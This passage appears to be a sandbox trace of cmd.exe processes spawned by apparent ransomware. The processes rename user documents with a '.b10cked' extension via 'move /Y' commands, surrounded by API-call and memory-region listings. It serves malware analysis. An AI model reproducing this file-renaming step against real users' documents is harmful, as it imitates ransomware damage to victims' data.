(_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.351] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.351] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.351] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.351] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.351] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.351] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f6e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.351] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f6e0, lpFilePart=0x26f6dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f6dc*="Desktop") returned 0x18 [0136.351] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.352] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f45c | out: lpFindFileData=0x26f45c) returned 0x3a0010 [0136.352] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0136.352] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f45c | out: lpFindFileData=0x26f45c) returned 0x3a0010 [0136.352] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0136.352] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f45c | out: lpFindFileData=0x26f45c) returned 0x3a0010 [0136.352] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0136.352] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.352] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.352] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.352] GetEnvironmentStringsW () returned 0x3a2af0* [0136.353] FreeEnvironmentStringsW (penv=0x3a2af0) returned 1 [0136.353] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.353] GetConsoleOutputCP () returned 0x1b5 [0136.369] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.369] GetUserDefaultLCID () returned 0x409 [0136.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f820, cchData=128 | out: lpLCData="0") returned 2 [0136.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f820, cchData=128 | out: lpLCData="0") returned 2 [0136.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f820, cchData=128 | out: lpLCData="1") returned 2 [0136.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.376] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.377] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.377] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.378] GetConsoleTitleW (in: lpConsoleTitle=0x3908e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.396] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.396] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.396] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.396] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.397] _wcsicmp (_String1="move", _String2=")") returned 68 [0136.397] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0136.397] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0136.397] _wcsicmp (_String1="IF", _String2="move") returned -4 [0136.397] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0136.397] _wcsicmp (_String1="REM", _String2="move") returned 5 [0136.397] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0136.399] GetConsoleTitleW (in: lpConsoleTitle=0x26f518, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.438] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0136.438] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0136.438] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0136.438] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0136.438] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0136.438] _wcsicmp (_String1="move", _String2="CD") returned 10 [0136.438] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0136.438] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0136.438] _wcsicmp (_String1="move", _String2="REN") returned -5 [0136.438] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0136.438] _wcsicmp (_String1="move", _String2="SET") returned -6 [0136.438] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0136.439] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0136.439] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0136.439] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0136.439] _wcsicmp (_String1="move", _String2="MD") returned 11 [0136.439] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0136.439] _wcsicmp (_String1="move", _String2="RD") returned -5 [0136.439] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0136.439] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0136.439] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0136.439] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0136.439] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0136.439] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0136.439] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0136.439] _wcsicmp (_String1="move", _String2="VER") returned -9 [0136.439] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0136.439] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0136.439] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0136.439] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0136.439] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0136.439] _wcsicmp (_String1="move", _String2="START") returned -6 [0136.439] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0136.439] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0136.439] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0136.440] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.440] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.440] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f2d4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f2cc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f2cc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.441] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.442] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0136.442] _wcsicmp (_String1="QXDEHM~1.DOC", _String2=".") returned 67 [0136.442] _wcsicmp (_String1="QXDEHM~1.DOC", _String2="..") returned 67 [0136.442] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\qxdehm~1.doc")) returned 0x20 [0136.442] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3a1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.442] SetErrorMode (uMode=0x0) returned 0x0 [0136.442] SetErrorMode (uMode=0x1) returned 0x0 [0136.442] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC", nBufferLength=0x104, lpBuffer=0x26ec5c, lpFilePart=0x26ec44 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC", lpFilePart=0x26ec44*="QXDEHM~1.DOC") returned 0x26 [0136.442] SetErrorMode (uMode=0x0) returned 0x1 [0136.442] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0136.442] _wcsicmp (_String1="QXDEHM~1.DOC", _String2=".") returned 67 [0136.442] _wcsicmp (_String1="QXDEHM~1.DOC", _String2="..") returned 67 [0136.442] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\qxdehm~1.doc")) returned 0x20 [0136.443] SetErrorMode (uMode=0x0) returned 0x0 [0136.443] SetErrorMode (uMode=0x1) returned 0x0 [0136.443] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC", nBufferLength=0x104, lpBuffer=0x26f0d8, lpFilePart=0x26ee70 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC", lpFilePart=0x26ee70*="QXDEHM~1.DOC") returned 0x26 [0136.443] SetErrorMode (uMode=0x0) returned 0x1 [0136.443] SetErrorMode (uMode=0x0) returned 0x0 [0136.443] SetErrorMode (uMode=0x1) returned 0x0 [0136.443] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked", nBufferLength=0x104, lpBuffer=0x26f2e0, lpFilePart=0x26ee70 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked", lpFilePart=0x26ee70*="qXDEHmzN LrwSQhutJ.docx.b10cked") returned 0x39 [0136.443] SetErrorMode (uMode=0x0) returned 0x1 [0136.443] SetLastError (dwErrCode=0x0) [0136.443] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\qxdehmzn lrwsqhutj.docx.b10cked")) returned 0xffffffff [0136.443] GetLastError () returned 0x2 [0136.443] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x26e7ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e7ec) returned 0x390e70 [0136.443] FindNextFileW (in: hFindFile=0x390e70, lpFindFileData=0x26e7ec | out: lpFindFileData=0x26e7ec) returned 0 [0136.444] GetLastError () returned 0x12 [0136.444] FindClose (in: hFindFile=0x390e70 | out: hFindFile=0x390e70) returned 1 [0136.444] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x3a1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a1be0) returned 0x390e70 [0136.445] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked", nBufferLength=0x104, lpBuffer=0x26ea84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked", lpFilePart=0x0) returned 0x39 [0136.445] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx", nBufferLength=0x104, lpBuffer=0x26ea84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx", lpFilePart=0x0) returned 0x31 [0136.445] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\qxdehmzn lrwsqhutj.docx")) returned 0x20 [0136.445] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\qxdehmzn lrwsqhutj.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\qxdehmzn lrwsqhutj.docx.b10cked"), dwFlags=0x3) returned 1 [0136.445] FindClose (in: hFindFile=0x390e70 | out: hFindFile=0x390e70) returned 1 [0136.445] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ea38 | out: _Buffer=" 1") returned 9 [0136.445] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.445] GetFileType (hFile=0x7) returned 0x2 [0136.461] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.462] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26e9c4 | out: lpMode=0x26e9c4) returned 1 [0136.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26e9f8 | out: lpConsoleScreenBufferInfo=0x26e9f8) returned 1 [0136.464] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0136.465] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ea38 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0136.465] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26ea1c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26ea1c*=0x1a) returned 1 [0136.467] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.467] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.483] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.483] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.483] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.483] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.484] SetConsoleInputExeNameW () returned 0x1 [0136.484] GetConsoleOutputCP () returned 0x1b5 [0136.484] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.484] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.488] exit (_Code=0) Process: id = "141" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16600" os_pid = "0xa18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13739 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13740 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13741 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13742 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 13743 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13744 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13745 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13746 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13747 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 13748 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14003 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14004 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14005 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14006 start_va = 0x4a0000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 14007 start_va = 0x740000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 14008 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14009 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14010 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14011 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14012 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14013 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14014 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14015 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14016 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14097 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 14098 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14099 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14100 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 14101 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 14102 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 14103 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 14104 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 14105 start_va = 0x5a0000 end_va = 0x702fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 14106 start_va = 0x750000 end_va = 0x134ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Thread: id = 198 os_tid = 0xa0c [0136.269] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fa34 | out: lpSystemTimeAsFileTime=0x30fa34*(dwLowDateTime=0x8b27c0e0, dwHighDateTime=0x1d440a9)) [0136.269] GetCurrentProcessId () returned 0xa18 [0136.269] GetCurrentThreadId () returned 0xa0c [0136.269] GetTickCount () returned 0x2b135 [0136.269] QueryPerformanceCounter (in: lpPerformanceCount=0x30fa2c | out: lpPerformanceCount=0x30fa2c*=19305871557) returned 1 [0136.270] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.270] __set_app_type (_Type=0x1) [0136.270] __p__fmode () returned 0x76b331f4 [0136.270] __p__commode () returned 0x76b331fc [0136.270] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.271] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.271] GetCurrentThreadId () returned 0xa0c [0136.271] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa0c) returned 0x38 [0136.271] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.271] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.271] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.322] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.322] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f9c4 | out: phkResult=0x30f9c4*=0x0) returned 0x2 [0136.322] VirtualQuery (in: lpAddress=0x30f9fb, lpBuffer=0x30f994, dwLength=0x1c | out: lpBuffer=0x30f994*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, 